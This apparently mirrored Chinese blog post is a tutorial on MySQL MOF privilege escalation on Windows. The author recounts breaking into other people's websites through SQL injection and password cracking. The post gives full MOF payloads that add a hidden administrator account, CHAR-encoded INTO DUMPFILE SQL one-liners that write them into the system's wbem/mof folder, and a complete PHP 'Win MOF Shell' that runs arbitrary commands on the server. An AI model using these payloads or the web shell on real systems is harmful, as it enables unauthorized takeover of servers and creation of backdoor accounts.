zoukankan      html  css  js  c++  java

  • Mof提权科普

    今天再拿一个站的时候遇到了很多问题,拿站的过程就不说了,其中要用到mof提权,不管能不能提下,我进行一个mof提权的科普

    这里我综合各类mof提权进行了 综合

    首先说一下,无shell情况下的mysql远程mof提权利用方法详解

    就是你注入拿到了数据库的root账号密码,直接进行

    扫到一个站的注入


    在havij中得到mysql数据库中mysql库保存的数据库密码: 


    有时候发现1.15版的还是最好用,最稳定,虽然速度慢了一点。 
    照样放到坛子里让机油破了 


    感谢Mr.Lu。顺便吐槽下,cmd5连个root都要收费。。。 
    在等着密码破解出来的时候顺便nmap了一下 


    意外发现端口改到了1126,给后面省下了不少时间。 
    照常外连试试 


    上个帖子里面有基友问这个软件是什么,我用的是navicat,感觉很好用的 
    现在的常规思路就是得到绝对路径,写一个小马,再进一步渗透。 
    但是网站上面暴不出路径,看看mysql的路径 
    用select @@basedir;命令可以看到; 


    网站的路径大概差不多了,懒得一个一个试了,最近mof提权挺火的,上次失败了一次,这次再来试试好了。 
    Mof的科普文很多, 

    mof文件内容为:

    #pragma namespace("\\.\root\subscription")instance of __EventFilter as $EventFilter{    EventNamespace = "Root\Cimv2";    Name  = "filtP2";    Query = "Select * From __InstanceModificationEvent "            "Where TargetInstance Isa "Win32_LocalTime" "            "And TargetInstance.Second = 5";    QueryLanguage = "WQL";};instance of ActiveScriptEventConsumer as $Consumer{    Name = "consPCSV2";    ScriptingEngine = "JScript";    ScriptText =    "var WSH = new ActiveXObject("WScript.Shell") WSH.run("net.exe user admin admin /add")"; };instance of __FilterToConsumerBinding{    Consumer   = $Consumer;    Filter = $EventFilter;};

     

    由于没有马,不能按照网盘里面说的先传一个mof上去,我就直接一次性写入。
    先是试了试直接将原来的语句写入,提示失败,原因就是语句里面很多";回车"之类的符号。
    然后就想转化为16进制或者asc码这样。
    先试了16进制。
    等了老半天什么还是登陆不上去,就放弃了,改用asc码,用的sql语句为:

     

    SELECT CHAR(35,112,114,97,103,109,97,32,110,97,109,101,115,112,97,99,101,40,34,92,92,92,92,46,92,92,114,111,111,116,92,92,115,117,98,115,99,114,105,112,116,105,111,110,34,41,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,95,95,69,118,101,110,116,70,105,108,116,101,114,32,97,115,32,36,69,118,101,110,116,70,105,108,116,101,114,13,10,123,13,10,32,32,32,32,69,118,101,110,116,78,97,109,101,115,112,97,99,101,32,61,32,34,82,111,111,116,92,92,67,105,109,118,50,34,59,13,10,32,32,32,32,78,97,109,101,32,32,61,32,34,102,105,108,116,80,50,34,59,13,10,32,32,32,32,81,117,101,114,121,32,61,32,34,83,101,108,101,99,116,32,42,32,70,114,111,109,32,95,95,73,110,115,116,97,110,99,101,77,111,100,105,102,105,99,97,116,105,111,110,69,118,101,110,116,32,34,13,10,32,32,32,32,32,32,32,32,32,32,32,32,34,87,104,101,114,101,32,84,97,114,103,101,116,73,110,115,116,97,110,99,101,32,73,115,97,32,92,34,87,105,110,51,50,95,76,111,99,97,108,84,105,109,101,92,34,32,34,13,10,32,32,32,32,32,32,32,32,32,32,32,32,34,65,110,100,32,84,97,114,103,101,116,73,110,115,116,97,110,99,101,46,83,101,99,111,110,100,32,61,32,53,34,59,13,10,32,32,32,32,81,117,101,114,121,76,97,110,103,117,97,103,101,32,61,32,34,87,81,76,34,59,13,10,125,59,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,65,99,116,105,118,101,83,99,114,105,112,116,69,118,101,110,116,67,111,110,115,117,109,101,114,32,97,115,32,36,67,111,110,115,117,109,101,114,13,10,123,13,10,32,32,32,32,78,97,109,101,32,61,32,34,99,111,110,115,80,67,83,86,50,34,59,13,10,32,32,32,32,83,99,114,105,112,116,105,110,103,69,110,103,105,110,101,32,61,32,34,74,83,99,114,105,112,116,34,59,13,10,32,32,32,32,83,99,114,105,112,116,84,101,120,116,32,61,13,10,32,32,32,32,34,118,97,114,32,87,83,72,32,61,32,110,101,119,32,65,99,116,105,118,101,88,79,98,106,101,99,116,40,92,34,87,83,99,114,105,112,116,46,83,104,101,108,108,92,34,41,92,110,87,83,72,46,114,117,110,40,92,34,110,101,116,46,101,120,101,32,117,115,101,114,32,97,100,109,105,110,32,97,100,109,105,110,32,47,97,100,100,92,34,41,34,59,13,10,32,125,59,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,95,95,70,105,108,116,101,114,84,111,67,111,110,115,117,109,101,114,66,105,110,100,105,110,103,13,10,123,13,10,32,32,32,32,67,111,110,115,117,109,101,114,32,32,32,61,32,36,67,111,110,115,117,109,101,114,59,13,10,32,32,32,32,70,105,108,116,101,114,32,61,32,36,69,118,101,110,116,70,105,108,116,101,114,59,13,10,125,59) INTO dumpfile  'c:/windows/system32/wbem/mof/nullevt.mof';


    这时候才意识到一个问题,上面的语句只添加了用户,忘了提升为管理员了。。。 
    好吧,重新写一遍mof

     

    select char(35,112,114,97,103,109,97,32,110,97,109,101,115,112,97,99,101,40,34,92,92,92,92,46,92,92,114,111,111,116,92,92,115,117,98,115,99,114,105,112,116,105,111,110,34,41,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,95,95,69,118,101,110,116,70,105,108,116,101,114,32,97,115,32,36,69,118,101,110,116,70,105,108,116,101,114,13,10,123,13,10,32,32,32,32,69,118,101,110,116,78,97,109,101,115,112,97,99,101,32,61,32,34,82,111,111,116,92,92,67,105,109,118,50,34,59,13,10,32,32,32,32,78,97,109,101,32,32,61,32,34,102,105,108,116,80,50,34,59,13,10,32,32,32,32,81,117,101,114,121,32,61,32,34,83,101,108,101,99,116,32,42,32,70,114,111,109,32,95,95,73,110,115,116,97,110,99,101,77,111,100,105,102,105,99,97,116,105,111,110,69,118,101,110,116,32,34,13,10,32,32,32,32,32,32,32,32,32,32,32,32,34,87,104,101,114,101,32,84,97,114,103,101,116,73,110,115,116,97,110,99,101,32,73,115,97,32,92,34,87,105,110,51,50,95,76,111,99,97,108,84,105,109,101,92,34,32,34,13,10,32,32,32,32,32,32,32,32,32,32,32,32,34,65,110,100,32,84,97,114,103,101,116,73,110,115,116,97,110,99,101,46,83,101,99,111,110,100,32,61,32,53,34,59,13,10,32,32,32,32,81,117,101,114,121,76,97,110,103,117,97,103,101,32,61,32,34,87,81,76,34,59,13,10,125,59,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,65,99,116,105,118,101,83,99,114,105,112,116,69,118,101,110,116,67,111,110,115,117,109,101,114,32,97,115,32,36,67,111,110,115,117,109,101,114,13,10,123,13,10,32,32,32,32,78,97,109,101,32,61,32,34,99,111,110,115,80,67,83,86,50,34,59,13,10,32,32,32,32,83,99,114,105,112,116,105,110,103,69,110,103,105,110,101,32,61,32,34,74,83,99,114,105,112,116,34,59,13,10,32,32,32,32,83,99,114,105,112,116,84,101,120,116,32,61,13,10,32,32,32,32,34,118,97,114,32,87,83,72,32,61,32,110,101,119,32,65,99,116,105,118,101,88,79,98,106,101,99,116,40,92,34,87,83,99,114,105,112,116,46,83,104,101,108,108,92,34,41,92,110,87,83,72,46,114,117,110,40,92,34,110,101,116,46,101,120,101,32,108,111,99,97,108,103,114,111,117,112,32,97,100,109,105,110,105,115,116,114,97,116,111,114,115,32,97,100,109,105,110,32,47,97,100,100,92,34,41,34,59,13,10,32,125,59,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,95,95,70,105,108,116,101,114,84,111,67,111,110,115,117,109,101,114,66,105,110,100,105,110,103,13,10,123,13,10,32,32,32,32,67,111,110,115,117,109,101,114,32,32,32,61,32,36,67,111,110,115,117,109,101,114,59,13,10,32,32,32,32,70,105,108,116,101,114,32,61,32,36,69,118,101,110,116,70,105,108,116,101,114,59,13,10,125,59) into dumpfile  'c:/windows/system32/wbem/mof/nullevt.mof';

     

    好了,这样就顺利登进去了;

    改天研究一下一次性完成添加管理员试试

    现在默认它还是会过5s添加一次用户,解决方法就是:
    第一 net stop winmgmt 停止服务,
    第二 删除文件夹:C:WINDOWSsystem32wbemRepository
    第三 net start winmgmt 启动服务
    还有其他方法在网盘的文件里面有写。

    一路看起来挺顺利的,是因为上次研究过这个。这次写的详细点了。

     

     

    第二种

     

    首先呢先谢谢米爷在我弄这个的时候把我骂开窍了- -。

    不多说了~。~像名称一样哈~

    首先呢是朋友扔我一shell

    他提权差就给咱了,简单的看了下,是php脚本的,一看php脚本就肯定带有,mysql。

    就在网站目录看了下data文件夹习惯性的~

    运气不错。Root。

    居然知道是这东西,上大马。(不知道利用菜刀)

    OK回显成功。

    5.0.67不用说都知道是什么了,这版本基本上udf都可以秒的,但毕竟这里说的是mof所以就用mof提吧。

    先找个可写路径。

    C盘可以,运气不错。

    然后在上传路径传个我们的mof文件

    代码如下:

    #pragmanamespace("\\.\root\subscription")

       

    instance of __EventFilter as $EventFilter

    {

       EventNamespace = "Root\Cimv2";

       Name  = "filtP2";

       Query = "Select * From __InstanceModificationEvent "

               "Where TargetInstance Isa "Win32_LocalTime" "

               "And TargetInstance.Second = 5";

       QueryLanguage = "WQL";

    };

       

    instance of ActiveScriptEventConsumer as$Consumer

    {

       Name = "consPCSV2";

       ScriptingEngine = "JScript";

       ScriptText =

       "var WSH = new ActiveXObject("WScript.Shell") WSH.run("net.exenet user user$ sword /add & net localgroup administrators user$ /add")";

    };

       

    instance of __FilterToConsumerBinding

    {

       Consumer   = $Consumer;

       Filter = $EventFilter;

    };

    生成的账号:user$ 密码为:sword

    这段代码可自行修改。

    接着呢执行命令:selectload_file('C:\RECYCLER\xx.mof') into dumpfile 'c:/windows/system32/wbem/mof/xx.mof';

    OK.。执行命令完成。

    由于权限设置无法直接查询管理员。登陆下就知道了。

    好了mof提权就这样。

    谢谢观看。

    Ps:由于当时提的时候截的几张图,后来管理员把mof的漏洞修复了。所以服务器没了。就这样~

    综合一下 

    还可直接使用mof马进行提权

    但是我经常被杀

    下面贴出代码,直接保存mof.php,即可

    运行的时候点read,多运行几次 ,因为read没有回显是没运行成功,如果出现错误他会,有回显的

    <?php$path="c:/windows/system32/canimei";session_start();if(!empty($_POST['submit'])){setcookie("connect");setcookie("connect[host]",$_POST['host']);setcookie("connect[user]",$_POST['user']);setcookie("connect[pass]",$_POST['pass']);setcookie("connect[dbname]",$_POST['dbname']);echo "<script>location.href='?action=connect'</script>";}if(empty($_GET["action"])){?><html><head><title>Win MOF Shell</title></head><body><formaction="?action=connect"method="post">Host:<inputtype="text"name="host"value="192.168.200.144:3306"><br/>User:<inputtype="text"name="user"value="root"><br/>Pass:<inputtype="password"name="pass"value="toor"><br/>DB:<inputtype="text"name="dbname"value="mysql"><br/><inputtype="submit"name="submit"value="Submit"><br/></form></body></html><?phpexit;}if($_GET[action]=='connect'){$conn=mysql_connect($_COOKIE["connect"]["host"],$_COOKIE["connect"]["user"],$_COOKIE["connect"]["pass"])ordie('<pre>'.mysql_error().'</pre>'); echo "<form action='' method='post'>";echo "Cmd:";echo "<input type='text' name='cmd' value='$strCmd'?>";echo "<br>";echo "<br>";echo "<inputtype='submit'value='Exploit'>";echo "</form>";echo "<formaction=''method='post'>";echo "<inputtype='hidden'name='flag'value='flag'>";echo "<inputtype='submit'value=' Read  '>";echo "</form>";if (isset($_POST['cmd'])){$strCmd=$_POST['cmd'];$cmdshell='cmd /c '.$strCmd.'>'.$path;$mofname="c:/windows/system32/wbem/mof/system.mof";$payload = "#pragma namespace("\\\\\\\\.\\\\root\\\\subscription")instance of __EventFilter as $EventFilter{  EventNamespace = "Root\\\\Cimv2";  Name  = "filtP2";  Query = "Select * From __InstanceModificationEvent "      "Where TargetInstance Isa \\"Win32_LocalTime\\" "      "And TargetInstance.Second = 5";  QueryLanguage = "WQL";};instance of ActiveScriptEventConsumer as $Consumer{  Name = "consPCSV2";  ScriptingEngine = "JScript";  ScriptText =  "var WSH = new ActiveXObject(\\"WScript.Shell\\")\\nWSH.run(\\"$cmdshell\\")"; };instance of __FilterToConsumerBinding{  Consumer = $Consumer;  Filter = $EventFilter;};";mysql_select_db($_COOKIE["connect"]["dbname"],$conn);$sql1="select '$payload' into dumpfile '$mofname';";if(mysql_query($sql1))  echo "<hr>Execute Successful!<br> Please click the read button to check the  result!!<br>If the result is not correct,try read again later<br><hr>"; else die(mysql_error()); mysql_close($conn);}if(isset($_POST['flag'])){  $conn=mysql_connect($_COOKIE["connect"]["host"],$_COOKIE["connect"]["user"],$_COOKIE["connect"]["pass"])  or die('<pre>'.mysql_error().'</pre>');   $sql2="select load_file("".$path."");";  $result2=mysql_query($sql2);  $num=mysql_num_rows($result2);  while ($row = mysql_fetch_array($result2, MYSQL_NUM)) {    echo "<hr/>";    echo '<pre>'. $row[0].'</pre>';  }  mysql_close($conn);}}?>

  • 相关阅读:
    Single Number II
    Pascal's Triangle
    Remove Duplicates from Sorted Array
    Populating Next Right Pointers in Each Node
    Minimum Depth of Binary Tree
    Unique Paths
    Sort Colors
    Swap Nodes in Pairs
    Merge Two Sorted Lists
    Climbing Stairs
  • 原文地址:https://www.cnblogs.com/h4ck0ne/p/5154602.html
Copyright © 2011-2022 走看看